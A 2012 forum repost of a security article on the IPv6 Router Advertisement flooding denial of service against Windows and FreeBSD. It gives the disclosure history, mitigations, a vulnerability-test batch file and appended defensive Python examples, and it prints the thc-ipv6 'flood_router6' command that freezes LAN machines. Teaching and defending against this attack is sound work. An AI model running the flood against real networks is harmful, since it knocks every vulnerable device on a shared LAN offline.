me.mello, posted June 9, 2012 (edited)

Get ready, because you have a lot to read plus references, but there is plenty to learn: IPv6 is vulnerable, a vulnerability so big that an attacker can stop all the PCs on the network, Xbox, PS3, FreeBSD, Win8, with just a single .html web page; a presentation very well described by Sam Bowne. Have fun.

Executive Summary

This is extremely dangerous! A single device can instantly stop all the Windows machines on a Local Area Network. In my tests, my Windows 7 virtual machine freezes totally and the only way to revive it is shutting the power off--an abnormal shutdown.

A student recorded this video, which makes it easier for people to quickly see the importance of the Windows IPv6 Router Advertisement vulnerability, without bothering with the technical details.

Imagine the effect of a single attacker on a small business, Internet coffeehouse, or any other LAN. This works on all Windows machines with IPv6 enabled, which includes Windows XP, Vista, Windows 7, Server 2008, and more. Mike Qaissaunee reported to me that it also stops X-Box and PS3 game consoles.

Suppose someone writes this into a malicious Web attack, so everyone who views a malicious Web page instantly kills all the machines on their LAN!

As far as I know, this attack will not traverse routers, so it "only" affects your local broadcast domain. But isn't that enough to deserve a security alert and a patch? Apparently not. Microsoft has told me and Marc Heuse* that they don't intend to patch this.

Responsible Disclosure

I regarded this as too dangerous to discuss on the Internet, and sent it to Microsoft privately.
However, they informed me that this is not a new attack--it has been publicly known for months:

- Excellent advisory from Marc Heuse* with complete disclosure timeline: http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt
- Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability
- CVE-2010-4669 - Router Advertisements Cause DoS in Windows: National Vulnerability Database (NVD), CVE-2010-4669

Mitigation

There is no patch from Microsoft. But there are four ways I know of to protect your computers:

- Disable IPv6. This is drastic, and will break services you may want, such as HomeGroups and DirectAccess. But it will protect you.
- Turn off Router Discovery -- this is a simple solution, requiring only one command, but it will prevent you from using Stateless Autoconfiguration. It's probably appropriate for servers, but not as good for client machines. Details are shown below.
- Use a firewall to block rogue Router Advertisements, while still allowing them from your authorized gateway. This is the most precise solution, but it is easily defeated. Details are shown below.
- Get a switch with RA Guard -- details here: IPv6 Security Part 2, RA Guard – Let’s get practical - Insinuator

Added 5-30-2011: Marc Heuse has demonstrated some techniques to evade RA Guard with packet fragmentation:

- Bypassing Cisco's ICMPv6 Router Advertisement Guard feature: http://www.networksecurityarchive.org/html/FullDisclosure/2011-05/msg00446.html
- Packet captures of RA Guard Evasion in action: Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt - Insinuator

Turning Off Router Discovery

I recommend turning off Router Discovery on all servers and any other machines that do not need "Stateless Autoconfiguration" (automatically configured IPv6 addresses), with this command (execute it from an Administrator Command Prompt):

    netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled

I found that solution here: IPv6: stateless autoconfiguration / manual configuration

Blocking Rogue Router Advertisements with Windows Firewall

This method allows you to use Stateless Autoconfiguration from your authorized gateways, but block dumb rogues. However, a smart rogue could just sniff your Router Advertisement packets and spoof the authorized source address, to bypass the firewall rule. So this is a weak defense.

To do this, open "Windows Firewall with Advanced Security" and double-click the "Core Networking - Router Advertisement (ICMPv6-In)" rule, as shown below on this page.

In the Properties sheet, on the Scope tab, in the "Remote IP address" section, the IP address starts at fe80::/64, which allows any host on the LAN to send Router Advertisements. Edit this to a more specific address which matches your authorized servers, as shown below on this page.

The Attack

    cd /pentest/spoofing/thc-ipv6
    ./flood_router6 eth0
    Ctrl+C

Result

Any Win 7 machine on the same LAN is dead instantly, as all its resources are consumed joining thousands of fake IPv6 networks. To see the effect, cancel the attack very rapidly with Ctrl+C.
Then with IPCONFIG you can see the effect on the target.

Batch File to Test for Vulnerability

On a Windows machine, run this batch file. Then run IFCONFIG on the other machines in your network. If they are vulnerable, they will show IPv6 addresses starting with dead:, as shown in the figure under the code.

    @ECHO OFF
    ECHO TESTING YOUR NETWORK FOR IPv6 ROUTER ADVERTISEMENT VULNERABILITY
    REM Put this machine in the dead: test prefix and enable router discovery
    netsh int ipv6 set addr "Local Area Connection" dead:1::1/64
    netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=enabled
    REM Publish a route in a dead: test prefix, pause about 2 seconds, then delete it
    netsh int ipv6 add route dead:407::/64 "Local Area Connection" siteprefixlength=64 publish=yes
    ping 127.0.0.1 -n 3 -w 1000
    netsh int ipv6 del route dead:407::/64 "Local Area Connection"
    ECHO SENDING ADVERTISEMENT #1 OF 3
    netsh int ipv6 add route dead:408::/64 "Local Area Connection" siteprefixlength=64 publish=yes
    ping 127.0.0.1 -n 3 -w 1000
    netsh int ipv6 del route dead:408::/64 "Local Area Connection"
    ECHO SENDING ADVERTISEMENT #2 OF 3
    netsh int ipv6 add route dead:409::/64 "Local Area Connection" siteprefixlength=64 publish=yes
    ping 127.0.0.1 -n 3 -w 1000
    netsh int ipv6 del route dead:409::/64 "Local Area Connection"
    ECHO SENDING ADVERTISEMENT #3 OF 3
    ECHO RUN IPCONFIG ON EACH MACHINE AND LOOK FOR ADDRESSES STARTING dead::

The result on a vulnerable machine:

Class Projects

Here are some projects designed for use in schools and demonstrations:

Project 8x: Win 7 DoS by RA Packets (20 pts.) -- a slower, controllable version of the attack allows you to see just how many packets are required to stop a Windows machine.

Project 9x: Router Advertisements with scapy (20 pts.)
-- with scapy, you can craft packets easily so you can try variations of the attack.

How to perform the attack from Windows using npg: Project 11x: Rogue RA Attack with npg on Windows (10 pts.)

FreeBSD is Vulnerable Too

At the Layer One security conference, on May 28, 2011, Justin Hohner tested a FreeBSD machine and told me it was vulnerable the same way. So we set up a VM and tried it there, with the results shown below:

The full-speed flood_router6 attack froze the FreeBSD machine so it was almost impossible to use, just like a Windows machine.

So I slowed the attack down to approximately 100 RAs per second to capture this image:

100 RAs per second raised the CPU to 19.9% in my test.

I filed a bug report: kern/157410: [ip6] IPv6 Router Advertisements Cause Excessive CPU Use

We tested OpenBSD and it was not vulnerable: it just ignores all RAs after the first ten or so, the same way Ubuntu Linux and Mac OS X do.

I just noticed that Marc Heuse already announced that BSD was vulnerable here http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt so that is not a new discovery. (5-30-2011)

Windows 8 Developer Preview is Vulnerable Too

This video was made by Josival Junior--good work!

Written by Sam Bowne; last modified 12 pm May 30, 2011

* On April 6 I mistakenly attributed Marc Heuse's advisory to Cisco. I fixed that error at 12:30 am April 7, 2011.
6-17-11: Fixed anchor tag error
9-15-2011: Added Win 8 Developer Preview video

I hope you learn something from this and don't believe that IPv6 is more secure than IPv4 and that it will revolutionize the world. As the article also says, companies like Microsoft have no intention of doing anything about this; moreover, they say this vulnerability has existed for months.

Source: Win 7 DoS by RA Packets

Edited June 10, 2012 by me.mello
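The article notes that a firewall rule scoped to the gateway's address is defeated by a spoofed source, while OpenBSD survives by ignoring RAs after the first ten or so. The sketch below is an added example (not part of the original post or of Sam Bowne's article) of monitoring logic that applies both checks to a time-ordered list of observed Router Advertisements; the gateway address, window, threshold and sample events are all assumptions constructed for illustration.

```python
from collections import deque
from ipaddress import ip_address

# Assumed policy for this sketch; none of these values come from the article.
AUTHORIZED_ROUTERS = {ip_address("fe80::1")}   # hypothetical gateway link-local
WINDOW_SECONDS = 1.0
MAX_PREFIXES = 10   # same order as "ignores all RAs after the first ten or so"


def analyze_ras(events, authorized=AUTHORIZED_ROUTERS,
                window=WINDOW_SECONDS, max_prefixes=MAX_PREFIXES):
    """events: time-ordered (timestamp, source, advertised_prefix) tuples.
    Returns alerts as (timestamp, kind, detail)."""
    alerts, recent, flooding = [], deque(), False
    for ts, src, prefix in events:
        # Check 1: same idea as scoping the firewall rule to the gateway.
        if ip_address(src) not in authorized:
            alerts.append((ts, "rogue-source", src))
        # Check 2: distinct prefixes seen inside the sliding window,
        # regardless of who claims to have sent them.
        recent.append((ts, prefix))
        while ts - recent[0][0] > window:
            recent.popleft()
        distinct = len({p for _, p in recent})
        if distinct > max_prefixes and not flooding:
            alerts.append((ts, "ra-flood", f"{distinct} prefixes in {window}s"))
        flooding = distinct > max_prefixes   # alert once per flood episode
    return alerts


# Constructed sample data (not a real capture).
NORMAL = [(t, "fe80::1", "2001:db8:1::/64") for t in (0.0, 10.0, 20.0)]
DUMB_ROGUE = [(25.0, "fe80::bad", "2001:db8:bad::/64")]
# A flood whose source address is spoofed to match the authorized router.
SPOOFED_FLOOD = [(30.0 + i * 0.01, "fe80::1", f"2001:db8:{i:x}::/64")
                 for i in range(100)]

if __name__ == "__main__":
    for alert in analyze_ras(NORMAL + DUMB_ROGUE + SPOOFED_FLOOD):
        print(alert)
```

The spoofed flood passes the source check entirely and is caught only by the prefix-rate check, which is why the source-address rule alone is described above as a weak defense.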
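The batch-file test ends by asking you to read IPCONFIG output on each machine and look for dead: addresses. As an added example (not part of the original post or of Sam Bowne's article), this parser does that check over saved ipconfig text; the sample output is constructed, and treating the whole dead::/16 range as "test prefix" is an assumption that covers the dead:407::, dead:408:: and dead:409:: routes in the batch file.

```python
import re
from ipaddress import ip_address, ip_network

# Assumption: any address in dead::/16 came from the test batch file.
TEST_NET = ip_network("dead::/16")
# Matches "IPv6 Address", "Temporary IPv6 Address" and "Link-local IPv6 Address"
# lines; the capture stops before a "%zone" or "(Preferred)" suffix.
ADDR = re.compile(r"IPv6 Address[ .]*:\s*([0-9A-Fa-f:]+)")


def find_test_addresses(ipconfig_text):
    """Return {adapter name: [addresses inside TEST_NET]} for affected adapters."""
    hits, adapter = {}, None
    for line in ipconfig_text.splitlines():
        # Adapter headers are unindented and end with a colon.
        if line and not line[0].isspace() and line.rstrip().endswith(":"):
            adapter = line.rstrip()[:-1]
            continue
        m = ADDR.search(line)
        if not m:
            continue
        try:
            addr = ip_address(m.group(1))
        except ValueError:
            continue   # not a parseable address; skip the line
        if addr in TEST_NET:
            hits.setdefault(adapter, []).append(str(addr))
    return hits


# Constructed sample output (not taken from a real machine).
SAMPLE_IPCONFIG = """\
Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:407::4c1d:8a2f:9b3e:71aa
   Temporary IPv6 Address. . . . . . : dead:408::95f0:11c2:3d4e:5a6b(Preferred)
   Link-local IPv6 Address . . . . . : fe80::4c1d:8a2f:9b3e:71aa%11
   IPv4 Address. . . . . . . . . . . : 192.168.1.20
"""

if __name__ == "__main__":
    print(find_test_addresses(SAMPLE_IPCONFIG))
```

An empty result means the machine did not autoconfigure from the test advertisements, for example because Router Discovery is disabled on that interface.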